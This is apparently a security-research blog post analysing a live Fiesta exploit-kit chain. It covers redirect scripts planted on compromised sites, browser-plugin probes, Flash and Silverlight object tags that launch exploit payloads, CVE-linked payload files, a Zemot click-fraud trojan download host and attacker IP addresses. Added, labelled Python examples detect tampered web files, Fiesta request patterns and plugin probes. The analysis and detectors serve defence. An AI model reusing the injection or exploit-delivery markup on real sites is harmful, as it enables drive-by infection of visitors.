By: Sameer Patil

Fiesta Exploit Kit: Live Infection

During our daily hunt for Exploit Kits (EK), we came across many live Fiesta exploit chains.
The infection started from the following compromised domains:
  •       orpi.com
  •       soyentrepreneur.com
  •       interfacelift.com

Compromised sites:

Attackers often use compromised sites as the first level of redirection in the EK infection cycle. In the first Fiesta EK instance that we analyzed, the attacker, after gaining root access, modified the “scripts.js” file at the following location:
  •       hxxp://www[.]media[.]orpi[.]com/js/scripts.js
 
All the pages importing this JavaScript file will redirect the user to "nvplus[.]com/wp-content/".
 
 
Another variation of the initial loading page redirection was observed in the compromised site “interfacelift[.]com” at the following location:
  •       hxxp://interfacelift[.]com/wallpaper/downloads/date/any/   
 
In this case the attacker added a <script> tag with the location pointing to another redirection site at:
  •          hxxp://sunduk[.]biz/forum/docs/

A third variation of the initial redirection was observed on the compromised site "soyentrepreneur[.]com", where the attacker created a new JavaScript file “funcionesCarga.js” at the following locations:
  •          hxxp://www[.]soyentrepreneur[.]com/assets/js/funcionesCarga.js
  •          hxxp://www[.]soyentrepreneur[.]com/assets/js/se2013/funcionesCarga.js
The website pages importing these JavaScript files will redirect the user to the Fiesta loading site.

All three initial redirection methods are fairly stealthy and can go unnoticed by web administrators for days. We found this approach to be more effective than, and the complete opposite of, a RIG EK compromise that we recently analyzed, where the attacker changed the home page of the website to ensure redirection.
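
One way a web administrator could notice these changes sooner, shown as an added Python example that is not part of the original post: compare the web root against a known-good hash baseline and list the off-site hosts that each modified or newly created file references. The host names, the injected lines and the function names are constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

WEB_SUFFIXES = {".js", ".html", ".htm", ".php"}
# Host of an absolute or protocol-relative URL inside script or markup text.
URL_HOST = re.compile(r"(?:https?:|[\"'])//([a-z0-9.-]+\.[a-z]{2,})", re.I)

def snapshot(webroot):
    """Map each web file's path (relative to webroot) to its SHA-256 digest."""
    root = Path(webroot)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file() and p.suffix.lower() in WEB_SUFFIXES}

def audit(webroot, baseline, own_hosts):
    """List files modified or added since the baseline, with the off-site
    hosts each one references (candidate redirect targets)."""
    root, report = Path(webroot), []
    for rel, digest in sorted(snapshot(root).items()):
        if baseline.get(rel) == digest:
            continue
        status = "modified" if rel in baseline else "added"
        text = (root / rel).read_text(errors="replace")
        hosts = {h.lower() for h in URL_HOST.findall(text)} - set(own_hosts)
        report.append((status, rel, sorted(hosts)))
    return report

def demo():
    """Constructed web root; the injected lines are illustrative, since the
    page does not show the code the attackers added."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "js").mkdir()
        (root / "js" / "scripts.js").write_text("function menu() { return 1; }\n")
        (root / "index.html").write_text('<script src="//www.site.example/js/scripts.js"></script>\n')
        baseline = snapshot(root)  # taken while the site is known to be clean
        with open(root / "js" / "scripts.js", "a") as fh:  # tampered existing file
            fh.write("document.write('<script src=\"http://redirector.example/wp-content/\"></script>');\n")
        (root / "js" / "funcionesCarga.js").write_text('var u = "//redirector.example/x/";\n')  # new file
        return audit(root, baseline, own_hosts={"www.site.example"})
```

The baseline has to be stored off the web server, since an attacker with root access can rewrite anything kept beside the files it describes.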

Fiesta EK:

Some of the recent live Fiesta EK loading sites found in the wild are:
Apart from the usual EK redirection chain, the loading site checks the user's browser as well as the presence of the Microsoft Silverlight and Adobe Flash plugins.
 
It checks whether the Silverlight plugin is installed by creating the following ActiveXObject:
  •  ActiveXObject("AgControl.AgControl") 
The presence of the Flash plugin is checked by calling the following function:
  • swfobject.embedSWF()
If both of the above calls raise an exception, the exploit cycle terminates. If vulnerable versions are found, the user is taken to the EK landing page.
 
Redirection to Fiesta EK Landing page
 
 
 

Fiesta Landing Page:

Initially, the malicious Silverlight and Flash files, for which the plugin checks have already been performed, are downloaded.
 
AV detection for the downloaded malicious files:
 
  •       rtu.swf: 2/55 (Generic Exploit)
  •       rtp.xap: 2/54 (CVE-2013-0074)
 
Following this, the main controller of Fiesta EK is called. An example from one of the Fiesta EK instances we analyzed:
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/1
It generates the following GET requests to the same domain during the course of the Exploit cycle:
 
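
The requests in this cycle share one shape: a single directory, a 64-character hexadecimal token, then optional ";number" fields and an optional "@@" suffix. The following Python detector for proxy logs is an added example, not part of the original post; the log format, host names, tokens, directory-length bounds and the min_hits threshold are assumptions.

```python
import hashlib
import re
from collections import defaultdict
from urllib.parse import urlsplit

# One directory, a 64-hex-character token, then optional ";number" fields
# and an optional "@@" suffix. The directory length bounds are an assumption.
FIESTA_PATH = re.compile(r"^/([a-z0-9]{4,12})/[0-9a-f]{64}((?:;\d+){0,3})(@@)?$")

def find_ek_sessions(log_lines, min_hits=3):
    """Group matching GETs by (client, host, directory); keep groups that
    reach min_hits, since a single 64-hex path can be a benign asset."""
    groups = defaultdict(list)
    for line in log_lines:
        fields = line.split()
        if len(fields) != 5 or fields[2] != "GET":
            continue
        _, client, _, url, _ = fields
        parts = urlsplit(url)  # urlsplit keeps ";..." fields inside the path
        match = FIESTA_PATH.match(parts.path)
        if match and parts.hostname:
            groups[(client, parts.hostname, match.group(1))].append(match.group(2))
    return {key: tails for key, tails in groups.items() if len(tails) >= min_hits}

def _tok(seed):
    """Constructed 64-hex token (SHA-256 of a label), not real traffic."""
    return hashlib.sha256(seed.encode()).hexdigest()

# Constructed proxy log: timestamp, client, method, URL, status.
SAMPLE_LOG = [
    "2000-01-01T10:00:01 10.0.0.5 GET http://ek.example.test/abcd123/%s;120000;0 200" % _tok("a"),
    "2000-01-01T10:00:02 10.0.0.5 GET http://ek.example.test/abcd123/%s 200" % _tok("b"),
    "2000-01-01T10:00:03 10.0.0.5 GET http://ek.example.test/abcd123/%s;1;2@@ 200" % _tok("c"),
    "2000-01-01T10:00:04 10.0.0.5 GET http://ek.example.test/abcd123/%s;5;1 200" % _tok("d"),
    # Benign look-alikes: a hashed asset name with an extension, and a lone hit.
    "2000-01-01T10:00:05 10.0.0.9 GET http://cdn.example.test/assets/%s.js 200" % _tok("e"),
    "2000-01-01T10:00:06 10.0.0.9 GET http://files.example.test/blob/%s 200" % _tok("f"),
]
```

Requiring several hits from one client to one host and directory is what separates the exploit cycle from a single content-addressed download.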
 
 
 
The Fiesta EK performs the following exploitation attempts, which result in the multiple GET requests:

Adobe Flash
  • Checks if Adobe Flash is installed and gets the application version.
  • It then generates a GET request to fetch the run-time parameters for the previously downloaded SWF file "rtu.swf".
  •       A sample object of type “application/x-shockwave-flash” with dynamic run-time parameters to run the exploit payload is created as shown below:
"<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='FnkwX'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='wetsgk=MWYzH'/><param name='Play' value='0'/></object>"
 
Microsoft Silverlight 
  • Checks if Microsoft Silverlight is installed in browser and gets the application version.
  • It then generates a GET request to fetch the run-time parameters for the previously downloaded XAP file "rtp.xap".
  • A sample object of type "application/x-silverlight" with dynamic run-time parameters to run the exploit payload is created as shown below:
"<object data='data:application/x-silverlight-2,' type='application/x-silverlight-2' width=10 height=10><param name='source' value='LVSDE'/><param name='initParams' value=<LONG_STRING_VALUE></object>"
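
An added example (not from the original post or from the kit's own code): a Python scanner a defender could run over captured response bodies, flagging the two plugin probes described earlier and the 10x10 Flash and Silverlight objects shown above. The sample bodies, the indicator names and the MAX_PX threshold are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Plugin MIME types and probe calls named in the write-up above.
PLUGIN_TYPES = {"application/x-shockwave-flash": "flash",
                "application/x-silverlight-2": "silverlight"}
PROBES = {
    "silverlight_probe": re.compile(r"ActiveXObject\(\s*[\"']AgControl\.AgControl[\"']"),
    "flash_probe": re.compile(r"swfobject\.embedSWF\s*\("),
}
# Fragments are cut out with a regex so markup inside script strings is seen too.
OBJECT_RX = re.compile(r"<object\b.*?</object>", re.I | re.S)
MAX_PX = 10  # assumption: "tiny" means no larger than the 10x10 samples

def _px(value):
    """Leading integer of a width/height attribute; missing counts as large."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else 10**6

class _ObjectParser(HTMLParser):
    """Collects plugin type, size and <param> values of one <object> fragment."""
    def __init__(self):
        super().__init__()
        self.plugin, self.tiny, self.params = None, False, {}

    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}
        if tag == "object":
            self.plugin = PLUGIN_TYPES.get(a.get("type", "").lower())
            self.tiny = max(_px(a.get("width")), _px(a.get("height"))) <= MAX_PX
        elif tag == "param":
            self.params[a.get("name", "").lower()] = a.get("value", "")

def scan_page(body):
    """Return sorted indicator names found in a captured response body."""
    hits = {name for name, rx in PROBES.items() if rx.search(body)}
    for fragment in OBJECT_RX.findall(body):
        p = _ObjectParser()
        p.feed(fragment)
        p.close()
        if p.plugin and p.tiny:
            hits.add("tiny_%s_object" % p.plugin)
        if p.plugin == "flash" and p.params.get("allowscriptaccess", "").lower() == "always":
            hits.add("flash_allowscriptaccess_always")
    return sorted(hits)

# Constructed response bodies, not captured traffic.
LANDING = ("<script>try { new ActiveXObject(\"AgControl.AgControl\"); } catch (e) {}\n"
           "document.write(\"<object width=10 height=10 type='application/x-shockwave-flash'>"
           "<param name='movie' value='sample.swf'/>"
           "<param name='allowScriptAccess' value='always'/></object>\");</script>")
BENIGN = ('<object type="application/x-shockwave-flash" width="640" height="360">'
          '<param name="movie" value="player.swf"></object>')
```

Each indicator also occurs on legitimate pages, so the useful signal is several of them in one response; markup that is assembled from obfuscated strings will not match until it has been decoded.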


Java
  • Checks if the Java plugin is installed and enabled in the browser.
  • Downloads a malicious Java archive (JAR) based on the installed version:
    • JAR File -> ianlar.jar: 4/55 (CVE-2012-1723)
  • It then generates a subsequent GET request to fetch parameter values required to execute the malicious JAR payload.
  • Creates a custom applet tag utilizing the run-time parameter values to run the exploit payload as seen below:
 

Adobe Reader
 
  •        Checks for the presence of the Adobe Reader plugin.
  •        Downloads and executes the malicious PDF file: 
    •        PDF File -> Ianlar.pdf: 8/55  

Post-Infection

Upon successful exploitation, Fiesta EK was observed installing a new variant of the Zemot Trojan from the following location:
  •       hxxp://warzine[.]su/b/shoe/54602
This is a well-known click-fraud botnet family, which will soon start click-fraud activity on the victim machine, making money for the malware authors.

This Click-Fraud malware family appears to be connected to many other EKs in addition to Fiesta. Some of the domains involved in the Click-Fraud activity:
 
 
 
The above domains were resolving to the following two servers located in Russia and Ukraine respectively:
  • 46.161.41.220
  • 192.162.19.34
A GET request to any of these domains looks like this:
 
 

 
 
- Sameer Patil
 
